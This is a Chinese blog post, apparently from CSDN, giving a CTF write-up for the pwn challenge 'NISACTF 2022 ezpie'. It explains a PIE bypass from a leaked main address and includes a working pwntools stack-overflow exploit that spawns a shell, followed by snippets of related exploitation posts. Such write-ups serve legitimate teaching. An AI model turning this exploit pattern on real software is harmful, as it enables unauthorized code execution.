【PWN · ret2text | PIE 】[NISACTF 2022]ezpie

已于 2023-05-31 08:47:49 修改
阅读量2.5k 收藏 14
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 【PWN · Stack】 文章标签: ctf pwn ret2text PIE保护
于 2023-05-31 08:47:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Mr_Fmnwon/article/details/130961178
文章介绍了在PIE(PositionIndependentExecutable)保护下,如何利用栈溢出漏洞进行ret2text攻击。尽管PIE使得程序地址随机,但通过获取main函数的真实地址,可以计算其他函数地址并构造payload,最终控制程序执行流程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

简单的PIE绕过

目录

前言

一、题目重述

二、解题思路

1.现有信息

2.思考过程

3.exp 

总结

前言

所接触的PIE保护的第一题,也非常简单。

一、题目重述

二、解题思路

1.现有信息

  • PIE保护——程序可能被加载到任意位置,所以位置是可变的。
  • 程序返回了main的真实地址
  • 存在后门函数shell
  • vuln()中的read 0x50u >> 28h,存在栈溢出

2.思考过程

如果没有PIE——简单的ret2text,在vuln中的read处将程序执行流劫持到后门函数处即可。

然而存在PIE——所有的地址都是从一开始随机确定的,但是相对偏移量保持不变

获取了main的真实地址——可以通过相对偏移量推出其他任意地址,然后就是正常的ret2text即可。

        如果把开启程序比作小船,那么PIE开启就相当于小船在茫茫大海上漂移,不过还好小船的锚是确定下来的——main的真实地址,我们就可以通过锚来找到这艘小船,找到小船上的各个房间(函数)。 

3.exp 

from pwn import *

context(os='linux',arch='i386',log_level='debug')
io=remote("node2.anna.nssctf.cn",28860)

#用于通过真实地址+偏移来计算任意函数真实地址
main_addr=0x770
shell_addr=0x80f
io.recvuntil(b"gift!")

#接收main的地址
main_real_addr=int(io.recv()[1:11],16)
print("main_real_addr:",main_real_addr)

#payload编写:溢出填充到返回地址前+后门函数真实地址(某函数真实地址+相对偏移量)
payload=b'a'*(0x28+4)
payload+=p32(main_real_addr+shell_addr-main_addr)

io.sendline(payload)
io.interactive()

总结

随着刷题的深入,各种保护的开启肯定是免不了的,对此多做总结,总是好的。

Partial Overwrite绕过PIE保护-[HNCTF 2022 WEEK2]ret2text
Welcome To Myon'Blog !
05-26 406
程序存在栈溢出漏洞,但因PIE保护导致地址随机化。利用PIE后12位固定特性,通过Partial Overwrite技术爆破后门函数地址(后四位0x11E5概率1/16)。编写exp循环发送payload(填充+后门地址),成功绕过PIE保护获取shell,得到flag:nssctf{W0w_You_byp@ss3d_PIE_You_are_gr3at!}。
ret2text涉及到的堆栈平衡问题
qq_41560595的博客
01-04 4859
这个指令要求rsp+0x40的值是16字节对齐。 错误的题解: from pwn import * io=process("./level0") raw_input() elf=ELF("./level0") system_addr=0x400596 io.recvuntil(b"World\n") payload=b"A"*(0x88)+p64(system_addr) io.send(payload) io.interactive() $rsp+0x40没有16字节对齐。 正确的题解: fro.
Canary、Pie保护
2301_79880752的博客
01-27 1123
Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中获取一个值,一般存到EBP - 0x4(32位)或RBP - 0x8(64位)的位置。
pwn旅行之[NISACTF 2022]ezpie
qq_66013948的博客
02-25 749
PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bss)等固定地址的一个防护技术,如果程序开启了PIE保护的话,在每次加载程序时都变换加载地址,从而不能通过ROPgadget等一些工具来帮助解题。​ 简单地说就是地址随机化。
[NISACTF 2022]ezpie- 入土为安的第十五天
lzx13290757580的博客
08-04 372
PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bss)等固定地址的一个防护技术,如果程序开启了PIE保护的话,在每次加载程序时都变换加载地址,从而不能通过ROPgadget等一些工具来帮助解题。这个题目的大致思路就是,通过接收输出的main函数的地址,再通过偏移量计算到后门函数的地址,之后,进行栈溢出攻击即可。运行可以看到确实有70。所以后三位才会保持不变。
[NISACTF 2022]ezpie 全网最详细
qq_41937545的博客
10-19 1257
我们只需要在接收到70的时候 接收末尾10字节的 整数(这样就可以在 payload当中利用 main函数的地址)思路就是 需要利用这个main函数的地址 多次连接会发现 他的 main函数都是 70结尾的。每一次运行程序的时候 地址都会被随机 所以我们在ida 当中没办法直接看到 地址。现在就需要计算shell到main函数的偏移量(因为我们只知道main的地址)emm 但是nc 的时候他直接给出了 main 函数的真实地址。然后计算一下偏移量(虽然有随机地址的保护 但是偏移量是不变的)
NSSCTF Pwn [NISACTF 2022]ezpie 题解
qq_33348179的博客
02-04 273
因为开启了PIE 所以IDA中 后门函数减去main函数的后三位就是偏移 给出的函数加上这个数就是后门函数地址。下载 exeinfo checksec。发现已经给出了main函数地址。32位 NX PIE开启。
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6832
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
PWN篇:ret2libc
weixin_44644249的博客
01-28 564
PWN篇:ret2libc 源码 #include void vuln_func(){ char buf[128]; read(STDIN_FILENO,buf,256); } int main(int argc,char* argv[]){ vuln_func(); write(STDOUT_FILENO,"hello world!\n",13); } 很明显vuln为溢出函数 编译 gcc -m32 -fno-stack-protector -no-pie -z execstack tes
pwn学习-ret2libc3
Sa1nZen的博客
06-30 684
pwn学习-ret2libc3
[NISACTF 2022]ezpie已解决
沈理大学牲的博客
10-31 814
PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bss)等固定地址的一个防护技术,如果程序开启了PIE保护的话,在每次加载程序时都变换加载地址,从而不能通过ROPgadget等一些工具来帮助解题。
ret2text
weixin_56301399的博客
07-20 620
第二步还是用反汇编,获取到system函数的地址。由于要完整调用,所以取lea指令的位置0x00000000004007b8,也就是0x4007b8。第一步利用反汇编,查看变量的位置,为[rbp-0x70]。从IDA中可以看出,pwn程序只有这两个用户函数,其他的都是库函数。让返回地址,也就是EIP指向system(‘/bin/sh’)所在语句对应的内存地址就能获得shell。局部变量s是用户可以通过gets()输入的,只要达到特定的长度L,就能覆盖掉黄色的返回地址。......
PIE保护机制(ASLR保护机制)
Sakura给爷pwn全场
09-07 1924
ASLR内存随机化保护机制
NX Stack Relro PIE四种保护
beidideshu的博客
06-17 1564
保护机制
国赛your_pwnPIE保护
playmaker的博客
05-13 2057
题目主要代码如下 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char s; // [rsp+0h] [rbp-110h] unsigned __int64 v5; // [rsp+108h] [rbp-8h] v5 = __readfsqword(0x28u); setbuf(stdout, 0LL);...
Linux下的ASLR(PIE)内存保护机制
weixin_30454481的博客
06-13 1002
1.1 Linux下的ASLR内存保护机制 1.1.1 Linux下的ASLR工作原理 工作原理与window下的aslr类似 1.1.2 Linux下利用内存地址泄露绕过ASLR ⑴. 原理分析: 那么如何解决地址随机化的问题呢?思路是:我们需要先泄漏出libc.so某些函数在内存中的地址,然后再利用泄漏出的函数地址根据偏移量计算出system()函数和/bin/s...
刷题小结2:pie与canary保护
weixin_66751120的博客
01-27 1241
pie保护开启后也就是所有地址都被随机化了,包括ida与ROPgadget所看到的所有地址都只有最后几位,这是相对于当前随机产生的pie的基址的偏移,那么我们如果能得到pie的基址,就能得到其他地址,从而拿到权限,这里总结的方法是接收pie的基址。先checksec一下,可以看到开启pie保护,同时ida里也不是可以用的地址,而是偏移。那么看主函数主函数的逻辑就是进行两次循环,分别输入1,2,3或者其他进入对应函数case1:非常明显的栈溢出,可以覆盖rbp以及返回地址。
CTFpwn常见保护及绕过:pie,canary
2302_79813730的博客
01-27 4253
这道题没有后门,我们还需要libc去做,这样我们需要泄露出一个正常的函数地址,来计算出libc_base,但是我们发现泄露的地址没有函数,libc_start_call_main(下称libc_call),这个函数我们不可以使用,因为找不到它的偏移(这里是因为虚拟机版本问题,一般libc_start_main(下称libc_main)可以被泄露出来)跟libc利用很像。之后跟进ctfshow函数,进行代码审计,第一个while循环没什么用,我们随便发送个数据就可以绕过,重点!
2018 10 15 pwn的学习0x6 aslr保护pie保护
startr4ck
10-15 1532
1.getint 是什么 getint函数将输入的字符流分解后才能整数,且每次调用得到一个整数。 getint需要返回转换得到的整数,并且在到达输入结尾的时候返回文件结束标记 2.什么是stdin stdout 怎么进行利用? C去写文件时的操作,File *fp=fopen(),这个fp就是我们向系统申请的 stdin,stdout,stderr就是这个fp,不过他是随着计算机系统的开启默认打...
pwnlib.exception.PwnlibException: './ret2text' is not marked as executable (+x)
最新发布
08-08
<think>我们正在处理用户的问题:如何修复 `pwnlib.exception.PwnlibException: './ret2text' is not executable` 错误。 这个错误通常发生在使用pwntools时,尝试运行的文件(这里是'./ret2text')没有可执行权限。 解决步骤: 1. 检查文件是否存在,并确认路径是否正确。 2. 给文件添加可执行权限(使用`chmod +x`命令)。 3. 如果文件是交叉编译的(例如在x86上运行ARM程序),确保系统支持运行该架构的程序(可能需要使用qemu等工具)。 但是,用户的问题中提到了`ret2text`,这通常是二进制漏洞利用中的一个例子(返回text段代码)。因此,我们假设用户正在尝试运行一个二进制文件。 具体操作: 1. 在终端中,进入包含'ret2text'文件的目录。 2. 运行命令:`chmod +x ret2text` 来添加可执行权限。 3. 然后再次尝试运行pwntools的脚本。 如果问题仍然存在,可能需要检查文件是否损坏,或者是否针对正确的架构编译。 另外,如果用户是在Windows系统上使用Linux子系统(WSL)或者Linux/macOS,那么权限系统是支持的。如果是在纯Windows上使用pwntools,可能需要注意文件权限的设置方式不同。 但是,根据错误信息,pwntools检测到文件不可执行,所以添加可执行权限是最直接的解决方案。 生成相关问题: 1. 如何检查文件的权限和属性? 2. 如何在pwntools中指定可执行文件的路径? 3. 如果文件是动态链接的,如何解决库缺失的问题?</think>要解决`pwnlib.exception.PwnlibException: './ret2text' is not executable`错误,请按照以下步骤操作: ### 1. **添加可执行权限** 在终端执行: ```bash chmod +x ./ret2text ``` 这将赋予文件可执行权限。Linux系统要求文件显式设置可执行位[^1]。 ### 2. **验证文件类型** 执行: ```bash file ./ret2text ``` 检查输出是否包含 `ELF`(如 `ELF 64-bit LSB executable`)。若非可执行文件(如文本文件或损坏的二进制),需重新编译源代码。 ### 3. **检查文件完整性** - 若为编译生成的二进制文件,重新编译: ```bash gcc -no-pie -fno-stack-protector -z execstack source.c -o ret2text ``` - 关键编译选项: - `-no-pie`:禁用地址随机化(PIE) - `-fno-stack-protector`:关闭栈保护 - `-z execstack`:允许栈执行 ### 4. **验证架构兼容性** 运行: ```bash uname -m ``` 确保二进制文件架构(如x86_64)与系统架构匹配。不匹配时需使用`qemu`模拟: ```bash sudo apt install qemu-user # 安装QEMU qemu-x86_64 ./ret2text # 运行64位程序 ``` ### 5. **在pwntools中指定解释器** 若需强制运行,在Python脚本中指定加载器: ```python from pwn import * context.binary = ELF('./ret2text') p = process(['/lib64/ld-linux-x86-64.so.2', './ret2text']) # 显式调用动态链接器 ``` ### 常见问题排查表 | 问题现象 | 解决方案 | |---------|----------| | 权限不足 | `chmod +x ret2text` | | 文件损坏 | 重新下载/编译 | | 架构不匹配 | 使用`qemu`或交叉编译 | | 缺少依赖库 | `ldd ret2text` 检查并安装缺失库 | | PIE保护冲突 | 编译时添加 `-no-pie` 选项 |
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值